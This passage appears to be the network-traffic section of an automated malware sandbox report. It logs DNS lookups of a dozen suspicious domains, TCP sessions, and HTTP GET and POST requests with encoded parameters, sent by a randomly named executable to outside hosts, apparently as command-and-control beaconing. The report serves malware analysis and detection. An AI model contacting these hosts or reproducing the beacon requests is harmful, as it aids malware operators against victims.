                                                                      Nov 20, 2024 09:24:40.153768063 CET5000380192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:40.167831898 CET5000380192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:40.174999952 CET8050003118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:40.175012112 CET8050003118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:41.033252001 CET8050003118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:41.033381939 CET8050003118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:41.033463001 CET5000380192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:41.676934004 CET5000380192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:42.697005987 CET5000480192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:42.703546047 CET8050004118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:42.703655005 CET5000480192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:42.712119102 CET5000480192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:42.718616962 CET8050004118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:43.602325916 CET8050004118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:43.602510929 CET8050004118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:43.602677107 CET5000480192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:43.605178118 CET5000480192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:43.613132000 CET8050004118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:48.818126917 CET5000580192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:48.823229074 CET8050005209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:48.823357105 CET5000580192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:48.837893963 CET5000580192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:48.843003988 CET8050005209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:49.431021929 CET8050005209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:49.431046963 CET8050005209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:49.431121111 CET5000580192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:50.348534107 CET5000580192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:51.366964102 CET5000680192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:51.372190952 CET8050006209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:51.372347116 CET5000680192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:51.385857105 CET5000680192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:51.390907049 CET8050006209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:51.957765102 CET8050006209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:51.957789898 CET8050006209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:51.957863092 CET5000680192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:52.895467997 CET5000680192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:53.913747072 CET5000780192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:53.918874979 CET8050007209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:53.918999910 CET5000780192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:53.930926085 CET5000780192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:53.935823917 CET8050007209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:53.935978889 CET8050007209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:54.511640072 CET8050007209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:54.511662960 CET8050007209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:54.511773109 CET5000780192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:55.442580938 CET5000780192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:56.461431026 CET5000880192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:56.467364073 CET8050008209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:56.467493057 CET5000880192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:56.477067947 CET5000880192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:56.482697010 CET8050008209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:57.083714962 CET8050008209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:57.083790064 CET8050008209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:57.083906889 CET5000880192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:57.086685896 CET5000880192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:57.091593981 CET8050008209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:25:02.119355917 CET5000980192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:02.124342918 CET8050009188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:02.124432087 CET5000980192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:02.137579918 CET5000980192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:02.142879963 CET8050009188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:02.842266083 CET8050009188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:02.842727900 CET8050009188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:02.842935085 CET5000980192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:03.645983934 CET5000980192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:04.664511919 CET5001080192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:04.669923067 CET8050010188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:04.671266079 CET5001080192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:04.685705900 CET5001080192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:04.690648079 CET8050010188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:05.414819002 CET8050010188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:05.414849997 CET8050010188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:05.415107012 CET5001080192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:06.192327976 CET5001080192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:07.210972071 CET5001180192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:07.216159105 CET8050011188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:07.216294050 CET5001180192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:07.229406118 CET5001180192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:07.234611034 CET8050011188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:07.234658957 CET8050011188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:07.927017927 CET8050011188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:07.927618980 CET8050011188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:07.927700996 CET5001180192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:08.739578009 CET5001180192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:09.758260965 CET5001280192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:09.763442993 CET8050012188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:09.763531923 CET5001280192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:09.772489071 CET5001280192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:09.781630993 CET8050012188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:10.504965067 CET8050012188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:10.505002975 CET8050012188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:10.505271912 CET5001280192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:10.507731915 CET5001280192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:10.513910055 CET8050012188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:17.144149065 CET5001380192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:17.149291039 CET8050013194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:17.149420977 CET5001380192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:17.161294937 CET5001380192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:17.166238070 CET8050013194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:17.778320074 CET8050013194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:17.778556108 CET8050013194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:17.778604031 CET8050013194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:17.778747082 CET5001380192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:17.778747082 CET5001380192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:18.677280903 CET5001380192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:19.695393085 CET5001480192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:19.702399015 CET8050014194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:19.702574015 CET5001480192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:19.716865063 CET5001480192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:19.723721981 CET8050014194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:20.321371078 CET8050014194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:20.321450949 CET8050014194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:20.321558952 CET5001480192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:21.223711967 CET5001480192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:22.242568970 CET5001580192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:22.247569084 CET8050015194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:22.247770071 CET5001580192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:22.262732983 CET5001580192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:22.267816067 CET8050015194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:22.267868996 CET8050015194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:22.866837025 CET8050015194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:22.866961002 CET8050015194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:22.867337942 CET5001580192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:23.770416975 CET5001580192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:24.789277077 CET5001680192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:24.796808004 CET8050016194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:24.796925068 CET5001680192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:24.807418108 CET5001680192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:24.816993952 CET8050016194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:25.416529894 CET8050016194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:25.416614056 CET8050016194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:25.416697025 CET8050016194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:25.416698933 CET5001680192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:25.416765928 CET8050016194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:25.416814089 CET5001680192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:25.421195030 CET5001680192.168.2.10194.245.148.189
                                                                      Nov 20, 2024 09:25:25.426636934 CET8050016194.245.148.189192.168.2.10
                                                                      Nov 20, 2024 09:25:30.589466095 CET5001780192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:30.604980946 CET8050017199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:30.605170012 CET5001780192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:30.621889114 CET5001780192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:30.626940012 CET8050017199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:31.060921907 CET8050017199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:31.060949087 CET8050017199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:31.060982943 CET8050017199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:31.061041117 CET5001780192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:31.061091900 CET5001780192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:32.129781008 CET5001780192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:33.148396969 CET5001880192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:33.153567076 CET8050018199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:33.153677940 CET5001880192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:33.167146921 CET5001880192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:33.175009966 CET8050018199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:33.612307072 CET8050018199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:33.612343073 CET8050018199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:33.612371922 CET8050018199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:33.612402916 CET5001880192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:33.612426043 CET5001880192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:34.678302050 CET5001880192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:36.915503979 CET5001980192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:36.921845913 CET8050019199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:36.924683094 CET5001980192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:36.940895081 CET5001980192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:36.945904016 CET8050019199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:36.946073055 CET8050019199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:37.379458904 CET8050019199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:37.379492998 CET8050019199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:37.379520893 CET8050019199.59.243.227192.168.2.10
                                                                      Nov 20, 2024 09:25:37.379540920 CET5001980192.168.2.10199.59.243.227
                                                                      Nov 20, 2024 09:25:37.379576921 CET5001980192.168.2.10199.59.243.227
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 20, 2024 09:22:54.595863104 CET5405453192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:22:54.608515978 CET53540541.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:23:10.992630005 CET5140353192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:23:12.004570007 CET5140353192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:23:12.731858015 CET53514031.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:23:12.731874943 CET53514031.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:23:25.773735046 CET5253753192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:23:25.813204050 CET53525371.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:23:39.179894924 CET5548153192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:23:39.860308886 CET53554811.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:23:53.492288113 CET5834453192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:23:53.641576052 CET53583441.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:24:06.868071079 CET6097653192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:24:07.645459890 CET53609761.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:24:21.179943085 CET5136953192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:24:21.221683025 CET53513691.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:24:34.572244883 CET5945053192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:24:34.965213060 CET53594501.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:24:48.624867916 CET6488653192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:24:48.815006971 CET53648861.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:25:02.102731943 CET5048853192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:25:02.117027998 CET53504881.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:25:15.523646116 CET5475553192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:25:16.536062002 CET5475553192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:25:17.141839027 CET53547551.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:25:17.141915083 CET53547551.1.1.1192.168.2.10
                                                                      Nov 20, 2024 09:25:30.430907011 CET6242453192.168.2.101.1.1.1
                                                                      Nov 20, 2024 09:25:30.586674929 CET53624241.1.1.1192.168.2.10
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 20, 2024 09:22:54.595863104 CET192.168.2.101.1.1.10x10a7Standard query (0)www.zkdamdjj.shopA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:10.992630005 CET192.168.2.101.1.1.10x115aStandard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:12.004570007 CET192.168.2.101.1.1.10x115aStandard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:25.773735046 CET192.168.2.101.1.1.10x83edStandard query (0)www.orbitoasis.onlineA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:39.179894924 CET192.168.2.101.1.1.10x6ee8Standard query (0)www.thaor56.onlineA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:53.492288113 CET192.168.2.101.1.1.10x2325Standard query (0)www.earbudsstore.shopA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:24:06.868071079 CET192.168.2.101.1.1.10xebe3Standard query (0)www.superiorfencing.netA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:24:21.179943085 CET192.168.2.101.1.1.10x6806Standard query (0)www.beylikduzu616161.xyzA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:24:34.572244883 CET192.168.2.101.1.1.10x1a7eStandard query (0)www.zxyck.netA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:24:48.624867916 CET192.168.2.101.1.1.10xdbStandard query (0)www.dailyfuns.infoA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:25:02.102731943 CET192.168.2.101.1.1.10x11daStandard query (0)www.mydreamdeal.clickA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:25:15.523646116 CET192.168.2.101.1.1.10x943Standard query (0)www.maitreyatoys.worldA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:25:16.536062002 CET192.168.2.101.1.1.10x943Standard query (0)www.maitreyatoys.worldA (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:25:30.430907011 CET192.168.2.101.1.1.10x327eStandard query (0)www.dating-apps-az-dn5.xyzA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 20, 2024 09:22:54.608515978 CET1.1.1.1192.168.2.100x10a7No error (0)www.zkdamdjj.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:22:54.608515978 CET1.1.1.1192.168.2.100x10a7No error (0)www.zkdamdjj.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:12.731858015 CET1.1.1.1192.168.2.100x115aNo error (0)www.75178.clubuaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:12.731858015 CET1.1.1.1192.168.2.100x115aNo error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:12.731858015 CET1.1.1.1192.168.2.100x115aNo error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:12.731874943 CET1.1.1.1192.168.2.100x115aNo error (0)www.75178.clubuaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:12.731874943 CET1.1.1.1192.168.2.100x115aNo error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:12.731874943 CET1.1.1.1192.168.2.100x115aNo error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:25.813204050 CET1.1.1.1192.168.2.100x83edNo error (0)www.orbitoasis.onlineorbitoasis.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:25.813204050 CET1.1.1.1192.168.2.100x83edNo error (0)orbitoasis.online66.29.132.194A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:39.860308886 CET1.1.1.1192.168.2.100x6ee8No error (0)www.thaor56.onlinethaor56.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:39.860308886 CET1.1.1.1192.168.2.100x6ee8No error (0)thaor56.online202.92.5.23A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:23:53.641576052 CET1.1.1.1192.168.2.100x2325No error (0)www.earbudsstore.shop194.195.220.41A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:24:07.645459890 CET1.1.1.1192.168.2.100xebe3No error (0)www.superiorfencing.netsuperiorfencing.netCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 20, 2024 09:24:07.645459890 CET1.1.1.1192.168.2.100xebe3No error (0)superiorfencing.net103.230.159.86A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:24:21.221683025 CET1.1.1.1192.168.2.100x6806No error (0)www.beylikduzu616161.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:24:21.221683025 CET1.1.1.1192.168.2.100x6806No error (0)www.beylikduzu616161.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:24:34.965213060 CET1.1.1.1192.168.2.100x1a7eNo error (0)www.zxyck.net118.107.250.103A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:24:48.815006971 CET1.1.1.1192.168.2.100xdbNo error (0)www.dailyfuns.info209.74.77.109A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:25:02.117027998 CET1.1.1.1192.168.2.100x11daNo error (0)www.mydreamdeal.click188.114.96.3A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:25:02.117027998 CET1.1.1.1192.168.2.100x11daNo error (0)www.mydreamdeal.click188.114.97.3A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:25:17.141839027 CET1.1.1.1192.168.2.100x943No error (0)www.maitreyatoys.world194.245.148.189A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:25:17.141915083 CET1.1.1.1192.168.2.100x943No error (0)www.maitreyatoys.world194.245.148.189A (IP address)IN (0x0001)false
                                                                      Nov 20, 2024 09:25:30.586674929 CET1.1.1.1192.168.2.100x327eNo error (0)www.dating-apps-az-dn5.xyz199.59.243.227A (IP address)IN (0x0001)false
                                                                      • www.zkdamdjj.shop
                                                                      • www.75178.club
                                                                      • www.orbitoasis.online
                                                                      • www.thaor56.online
                                                                      • www.earbudsstore.shop
                                                                      • www.superiorfencing.net
                                                                      • www.beylikduzu616161.xyz
                                                                      • www.zxyck.net
                                                                      • www.dailyfuns.info
                                                                      • www.mydreamdeal.click
                                                                      • www.maitreyatoys.world
                                                                      • www.dating-apps-az-dn5.xyz
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.1049847188.114.97.3806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:22:54.631941080 CET494OUTGET /vluw/?prh4=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G8ybZX+Xf8gbOpuID/3YwCRTfrNHUUA==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zkdamdjj.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:22:55.944574118 CET1236INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 20 Nov 2024 08:22:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      x-redirect-by: WordPress
                                                                      location: https://zkdamdjj.shop/vluw/?prh4=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G8ybZX+Xf8gbOpuID/3YwCRTfrNHUUA==&_VK8=7pXD8zQxGFxP
                                                                      x-litespeed-cache-control: public,max-age=3600
                                                                      x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.a6d5303f744e03a41043b4a748aa35ee,02a_
                                                                      x-litespeed-cache: miss
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NNiHXsjVAte7m8x96i6u%2Fsyzo755dDt6LjKyQ8GUGTWOvmIbrlbcCiT8zzFSMMN0GsppbNXc4j%2FdT1OpFKf06%2BQfXHjNbaHm%2Bin1Dr3lN9IIjF6s1LbzUfwbK28OV0zWjVeJ9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e5708f1ea358c3f-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=494&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&
                                                                      Data Raw:
                                                                      Data Ascii:
                                                                      Nov 20, 2024 09:22:55.944843054 CET12INData Raw: 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: =0"0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.104996123.167.152.41806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:12.760330915 CET741OUTPOST /a4h7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Origin: http://www.75178.club
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.75178.club/a4h7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
